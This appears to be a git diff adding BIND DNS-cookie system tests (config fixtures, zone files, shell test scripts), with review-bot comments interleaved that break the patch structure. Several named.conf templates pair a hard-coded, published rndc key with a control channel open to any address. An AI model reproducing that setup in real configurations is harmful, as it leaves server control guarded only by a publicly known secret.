0000000..7d8cfe3 --- /dev/null +++ b/bin/tests/system/cookie/bad-cookie-badaes.conf @@ -0,0 +1,17 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + cookie-algorithm aes; + cookie-secret "ebc7701beabb4a40c57d140eeb6733faaa"; // 136 bits +}; 
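Review bot: In the TCP branch of the main loop in ans.py, `except s.timeout:` names the listening socket's `timeout` attribute (the value set by `settimeout(1)`), not an exception class, so under Python 3 any exception raised inside that `try` turns into a `TypeError` instead of a timeout being ignored; it should read `except socket.timeout:`. The same branch uses `struct.unpack` and `struct.pack` although the file has no `import struct` (it only works if one of the `from dns.… import *` lines happens to re-export the module), and it relies on single `recv()` and `send()` calls to move a whole length-prefixed message, so a short read is handed to `dns.message.from_wire` and the resulting exception ends the responder. Near the top of the file, the "DNS 2.0" keyring values are written with braces (`{"hmac-sha256", "aaaaaaaaaaaa"}`), which builds a set rather than an (algorithm, secret) pair, and the bare `except:` hides whatever that causes; `logquery` likewise passes three arguments to `f.write`. A sketch of the TCP read path follows.

```python
import struct  # explicit; currently only in scope if a wildcard import re-exports it


def recv_exact(conn, count):
    """Read exactly count bytes from conn, or return None if the peer closes first."""
    data = b""
    while len(data) < count:
        chunk = conn.recv(count - len(data))
        if not chunk:
            return None
        data += chunk
    return data


# ... unchanged: select loop, UDP branch, accept() and the "TCP Query received" prints ...
                # get TCP message length
                buf = recv_exact(cs, 2)
                msg = recv_exact(cs, struct.unpack(">H", buf)[0]) if buf else None
                if msg is not None:
                    rsp = create_response(msg, True, True, ns10)
                    print(dns.rcode.to_text(rsp.rcode()))
                    wire = rsp.to_wire()
                    cs.sendall(struct.pack(">H", len(wire)) + wire)
                cs.close()
            except socket.timeout:
                pass
```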
diff --git a/bin/tests/system/cookie/bad-cookie-badhex.conf b/bin/tests/system/cookie/bad-cookie-badhex.conf
new file mode 100644
index 0000000..43c11ad
--- /dev/null
+++ b/bin/tests/system/cookie/bad-cookie-badhex.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ cookie-secret "012345678901234567890123456789012345678901234567890123456789012";
+};
diff --git a/bin/tests/system/cookie/bad-cookie-badsiphash24.conf b/bin/tests/system/cookie/bad-cookie-badsiphash24.conf
new file mode 100644
index 0000000..25ff78f
--- /dev/null
+++ b/bin/tests/system/cookie/bad-cookie-badsiphash24.conf
@@ -0,0 +1,17 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ cookie-algorithm siphash24;
+ cookie-secret "ebc7701beabb4a40c57d140eeb6733faaabbccdd"; // 160 bits
+};
diff --git a/bin/tests/system/cookie/bad-cookie-toolong.conf b/bin/tests/system/cookie/bad-cookie-toolong.conf
new file mode 100644
index 0000000..5ea67b9
--- /dev/null
+++ b/bin/tests/system/cookie/bad-cookie-toolong.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ cookie-secret "01234567890123456789012345678901234567890123456789012345678901234567890";
+};
diff --git a/bin/tests/system/cookie/clean.sh b/bin/tests/system/cookie/clean.sh
new file mode 100644
index 0000000..2c10757
--- /dev/null
+++ b/bin/tests/system/cookie/clean.sh
@@ -0,0 +1,24 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f ns*/named.conf
+rm -f dig.out.*
+rm -f named.run.*
+rm -f rndc.out.*
+rm -f ns1/named_dump.db*
+rm -f ns*/named.memstats
+rm -f ns*/named.run
+rm -f ns*/named.lock
+rm -f ns*/managed-keys.bind*
+rm -f ns*/named.run.prev
+rm -f ans*/ans.run ans*/ans.log ans*/query.log
diff --git a/bin/tests/system/cookie/good-cookie-aes.conf b/bin/tests/system/cookie/good-cookie-aes.conf
new file mode 100644
index 0000000..97a6f67
--- /dev/null
+++ b/bin/tests/system/cookie/good-cookie-aes.conf
@@ -0,0 +1,17 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ cookie-algorithm aes;
+ cookie-secret "ebc7701beabb4a40c57d140eeb6733fa"; // 128 bits
+};
diff --git a/bin/tests/system/cookie/good-cookie-siphash24.conf b/bin/tests/system/cookie/good-cookie-siphash24.conf
new file mode 100644
index 0000000..c937d71
--- /dev/null
+++ b/bin/tests/system/cookie/good-cookie-siphash24.conf
@@ -0,0 +1,17 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ cookie-algorithm siphash24;
+ cookie-secret "ebc7701beabb4a40c57d140eeb6733fa"; // 128 bits
+};
diff --git a/bin/tests/system/cookie/ns1/example.db b/bin/tests/system/cookie/ns1/example.db
new file mode 100644
index 0000000..75a6d3c
--- /dev/null
+++ b/bin/tests/system/cookie/ns1/example.db
@@ -0,0 +1,24 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ SOA ns1 hostmaster.isc.org. 1 600 600 1200 600
+@ NS ns1
+ns1 A 10.53.0.1
+large TXT ( large large large large large large large large
+ large large large large large large large large
+ large large large large large large large large
+ large large large large large large large large
+ large large large large large large large large
+ large large large large large large large large
+ large large large large large large large large
+ large large large large large large large large
+ large large large large large large large large
+ large large large large large large large large )
diff --git a/bin/tests/system/cookie/ns1/named.conf.in b/bin/tests/system/cookie/ns1/named.conf.in
new file mode 100644
index 0000000..129a9b1
--- /dev/null
+++ b/bin/tests/system/cookie/ns1/named.conf.in
@@ -0,0 +1,60 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+key foo {
+ secret "aaaaaaaaaaaa";
+ algorithm hmac-sha256;
+};
+
+server 10.53.0.10 {
+ keys foo;
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.1 dscp 1;
+ notify-source 10.53.0.1 dscp 2;
+ transfer-source 10.53.0.1 dscp 3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation yes;
+ deny-answer-addresses { 192.0.2.0/24; 2001:db8:beef::/48; }
+ except-from { "example.org"; };
+ deny-answer-aliases { "example.org"; }
+ except-from { "goodcname.example.net";
+ "gooddname.example.net"; };
+ allow-query {!10.53.0.8; any; };
+ send-cookie yes;
+ nocookie-udp-size 512;
+};
+
+zone "." {
+ type hint;
+ file "root.hint";
+};
+
+zone "example" {
+ type primary;
+ file "example.db";
+};
diff --git a/bin/tests/system/cookie/ns1/root.hint b/bin/tests/system/cookie/ns1/root.hint
new file mode 100644
index 0000000..993227d
--- /dev/null
+++ b/bin/tests/system/cookie/ns1/root.hint
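Review bot: The `controls` statement in ns1/named.conf.in accepts rndc connections from `any` and authenticates them with `rndc_key`, whose secret is the fixed literal `1234abcd8765` committed in the file; the same pairing recurs in the ns3, ns4, ns5, ns6 and ns8 `named.conf.in` hunks of this commit. That is presumably acceptable for a fixture listening on a 10.53.0.x test address, but nothing in the file says so, and a copied fragment would carry a published key and an open ACL with it. I would add a comment above the key, e.g. `/* Test fixture only: fixed, public rndc key; exposure is limited by the test listen address, not by the ACL. */`. If the harness always connects from the test addresses, narrowing `allow { any; }` to those addresses would make the fixture match its intent.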
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 999999
+. IN NS a.root-servers.nil.
+a.root-servers.nil. IN A 10.53.0.2
diff --git a/bin/tests/system/cookie/ns2/named.conf.in b/bin/tests/system/cookie/ns2/named.conf.in
new file mode 100644
index 0000000..ef08125
--- /dev/null
+++ b/bin/tests/system/cookie/ns2/named.conf.in
@@ -0,0 +1,31 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.2 dscp 1;
+ notify-source 10.53.0.2 dscp 2;
+ transfer-source 10.53.0.2 dscp 3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-validation no;
+ send-cookie yes;
+ nocookie-udp-size 512;
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
diff --git a/bin/tests/system/cookie/ns2/root.db b/bin/tests/system/cookie/ns2/root.db
new file mode 100644
index 0000000..533ab88
--- /dev/null
+++ b/bin/tests/system/cookie/ns2/root.db
@@ -0,0 +1,28 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ SOA a.root-servers.nil. hostmaster.isc.org. 1 600 600 1200 600
+@ NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.2
+large.xxx TXT ( large large large large large large large large
+ large large large large large large large large
+ large large large large large large large large
+ large large large large large large large large
+ large large large large large large large large
+ large large large large large large large large
+ large large large large large large large large
+ large large large large large large large large
+ large large large large large large large large
+ large large large large large large large large )
+tld. NS ns.tld.
+ns.tld A 10.53.0.9
+tsig. NS ns.tsig.
+ns.tsig A 10.53.0.10
diff --git a/bin/tests/system/cookie/ns3/named.conf.in b/bin/tests/system/cookie/ns3/named.conf.in
new file mode 100644
index 0000000..8b2ad79
--- /dev/null
+++ b/bin/tests/system/cookie/ns3/named.conf.in
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.3 dscp 1;
+ notify-source 10.53.0.3 dscp 2;
+ transfer-source 10.53.0.3 dscp 3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation yes;
+ deny-answer-addresses { 192.0.2.0/24; 2001:db8:beef::/48; }
+ except-from { "example.org"; };
+ deny-answer-aliases { "example.org"; }
+ except-from { "goodcname.example.net";
+ "gooddname.example.net"; };
+ allow-query {!10.53.0.8; any; };
+ send-cookie yes;
+ nocookie-udp-size 512;
+ require-server-cookie yes;
+};
+
+zone "." {
+ type hint;
+ file "root.hint";
+};
+
+zone "example" {
+ type primary;
+ file "example.db";
+};
diff --git a/bin/tests/system/cookie/ns3/root.hint b/bin/tests/system/cookie/ns3/root.hint
new file mode 100644
index 0000000..993227d
--- /dev/null
+++ b/bin/tests/system/cookie/ns3/root.hint
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 999999
+. IN NS a.root-servers.nil.
+a.root-servers.nil. IN A 10.53.0.2
diff --git a/bin/tests/system/cookie/ns4/named.conf.in b/bin/tests/system/cookie/ns4/named.conf.in
new file mode 100644
index 0000000..0b14272
--- /dev/null
+++ b/bin/tests/system/cookie/ns4/named.conf.in
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.4;
+ notify-source 10.53.0.4;
+ transfer-source 10.53.0.4;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation yes;
+ cookie-algorithm siphash24;
+ cookie-secret "569d36a6cc27d6bf55502183302ba352";
+ require-server-cookie yes;
+};
+
+zone "." {
+ type hint;
+ file "root.hint";
+};
diff --git a/bin/tests/system/cookie/ns4/root.hint b/bin/tests/system/cookie/ns4/root.hint
new file mode 100644
index 0000000..993227d
--- /dev/null
+++ b/bin/tests/system/cookie/ns4/root.hint
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 999999
+. IN NS a.root-servers.nil.
+a.root-servers.nil. IN A 10.53.0.2
diff --git a/bin/tests/system/cookie/ns5/named.conf.in b/bin/tests/system/cookie/ns5/named.conf.in
new file mode 100644
index 0000000..2aabc5a
--- /dev/null
+++ b/bin/tests/system/cookie/ns5/named.conf.in
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.5;
+ notify-source 10.53.0.5;
+ transfer-source 10.53.0.5;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.5; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation yes;
+ cookie-algorithm siphash24;
+ cookie-secret "569d36a6cc27d6bf55502183302ba352";
+ cookie-secret "6b300e27a0db46d4b046e4189790fa7d";
+ require-server-cookie yes;
+};
+
+zone "." {
+ type hint;
+ file "root.hint";
+};
diff --git a/bin/tests/system/cookie/ns5/root.hint b/bin/tests/system/cookie/ns5/root.hint
new file mode 100644
index 0000000..993227d
--- /dev/null
+++ b/bin/tests/system/cookie/ns5/root.hint
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 999999
+. IN NS a.root-servers.nil.
+a.root-servers.nil. IN A 10.53.0.2
diff --git a/bin/tests/system/cookie/ns6/named.conf.in b/bin/tests/system/cookie/ns6/named.conf.in
new file mode 100644
index 0000000..2bf3793
--- /dev/null
+++ b/bin/tests/system/cookie/ns6/named.conf.in
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.6 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.6;
+ notify-source 10.53.0.6;
+ transfer-source 10.53.0.6;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.6; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation yes;
+ cookie-algorithm siphash24;
+ cookie-secret "6b300e27a0db46d4b046e4189790fa7d";
+ require-server-cookie yes;
+};
+
+zone "." {
+ type hint;
+ file "root.hint";
+};
diff --git a/bin/tests/system/cookie/ns6/root.hint b/bin/tests/system/cookie/ns6/root.hint
new file mode 100644
index 0000000..993227d
--- /dev/null
+++ b/bin/tests/system/cookie/ns6/root.hint
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 999999
+. IN NS a.root-servers.nil.
+a.root-servers.nil. IN A 10.53.0.2
diff --git a/bin/tests/system/cookie/ns7/named.conf.in b/bin/tests/system/cookie/ns7/named.conf.in
new file mode 100644
index 0000000..c9518ae
--- /dev/null
+++ b/bin/tests/system/cookie/ns7/named.conf.in
@@ -0,0 +1,31 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.7 dscp 1;
+ notify-source 10.53.0.7 dscp 2;
+ transfer-source 10.53.0.7 dscp 3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.7; };
+ listen-on-v6 { none; };
+ recursion no;
+ answer-cookie no;
+ send-cookie yes;
+ nocookie-udp-size 512;
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
diff --git a/bin/tests/system/cookie/ns7/root.db b/bin/tests/system/cookie/ns7/root.db
new file mode 100644
index 0000000..39a63da
--- /dev/null
+++ b/bin/tests/system/cookie/ns7/root.db
@@ -0,0 +1,24 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ SOA a.root-servers.nil. hostmaster.isc.org. 1 600 600 1200 600
+@ NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.2
+large.xxx TXT ( large large large large large large large large
+ large large large large large large large large
+ large large large large large large large large
+ large large large large large large large large
+ large large large large large large large large
+ large large large large large large large large
+ large large large large large large large large
+ large large large large large large large large
+ large large large large large large large large
+ large large large large large large large large )
diff --git a/bin/tests/system/cookie/ns8/example.db b/bin/tests/system/cookie/ns8/example.db
new file mode 100644
index 0000000..7fa64d6
--- /dev/null
+++ b/bin/tests/system/cookie/ns8/example.db
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 3600 SOA . . 0 0 0 0 0
+@ 3600 NS .
diff --git a/bin/tests/system/cookie/ns8/named.conf.in b/bin/tests/system/cookie/ns8/named.conf.in
new file mode 100644
index 0000000..1a9697b
--- /dev/null
+++ b/bin/tests/system/cookie/ns8/named.conf.in
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.8 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.8;
+ notify-source 10.53.0.8;
+ transfer-source 10.53.0.8;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.8; };
+ listen-on-v6 { none; };
+ dnssec-validation yes;
+ rate-limit {};
+ require-server-cookie yes;
+};
+
+zone "example" {
+ type primary;
+ file "example.db";
+};
diff --git a/bin/tests/system/cookie/prereq.sh b/bin/tests/system/cookie/prereq.sh
new file mode 100644
index 0000000..ad8bbe3
--- /dev/null
+++ b/bin/tests/system/cookie/prereq.sh
@@ -0,0 +1,33 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. "$SYSTEMTESTTOP/conf.sh"
+
+set -e
+
+if test -n "$PYTHON"
+then
+ if $PYTHON -c "import dns" 2> /dev/null
+ then
+ :
+ else
+ echo_i "This test requires the dnspython module." >&2
+ exit 1
+ fi
+else
+ echo_i "This test requires Python and the dnspython module." >&2
+ exit 1
+fi
+
+exit 0
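Review bot: In cookie/ns8/named.conf.in the `key rndc_key` block hard-codes a secret that is published with the source tree (`secret "1234abcd8765";`) and the `controls` statement admits `allow { any; }`, yet nothing in the file marks this as fixture-only. A short comment above the key, such as `/* Test-only rndc key, published in the source tree; never reuse outside the system tests. */`, would keep the template from being copied into a real configuration, where the control channel would then be protected only by a publicly known key. If the harness reaches this channel solely from the 10.53.0.x test addresses (not visible in this hunk), narrowing the ACL to that range would be a cheap second safeguard.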
diff --git a/bin/tests/system/cookie/setup.sh b/bin/tests/system/cookie/setup.sh
new file mode 100644
index 0000000..c679d03
--- /dev/null
+++ b/bin/tests/system/cookie/setup.sh
@@ -0,0 +1,24 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
+copy_setports ns4/named.conf.in ns4/named.conf
+copy_setports ns5/named.conf.in ns5/named.conf
+copy_setports ns6/named.conf.in ns6/named.conf
+copy_setports ns7/named.conf.in ns7/named.conf
+copy_setports ns8/named.conf.in ns8/named.conf
diff --git a/bin/tests/system/cookie/tests.sh b/bin/tests/system/cookie/tests.sh
new file mode 100755
index 0000000..29ace6f
--- /dev/null
+++ b/bin/tests/system/cookie/tests.sh
@@ -0,0 +1,515 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +status=0 +n=0 + +getcookie() { + awk '$2 == "COOKIE:" { + print $3; + }' < $1 | tr -d '\r' +} + +fullcookie() { + awk 'BEGIN { n = 0 } + // { v[n++] = length(); } + END { print (v[1] == v[2]); }' +} + +havetc() { + grep 'flags:.* tc[^;]*;' $1 > /dev/null +} + +for bad in bad*.conf +do + n=`expr $n + 1` + echo_i "checking that named-checkconf detects error in $bad ($n)" + ret=0 + $CHECKCONF $bad > /dev/null 2>&1 && ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +for good in good*.conf +do + n=`expr $n + 1` + echo_i "checking that named-checkconf detects accepts $good ($n)" + ret=0 + $CHECKCONF $good > /dev/null 2>&1 || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +n=`expr $n + 1` +echo_i "checking RCODE=FORMERR to query without question section and without COOKIE option ($n)" +ret=0 +$DIG $DIGOPTS +qr +header-only +nocookie version.bind txt ch @10.53.0.1 > dig.out.test$n +grep COOKIE: dig.out.test$n > /dev/null && ret=1 +grep "status: FORMERR" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking RCODE=NOERROR to query without question section and with COOKIE option 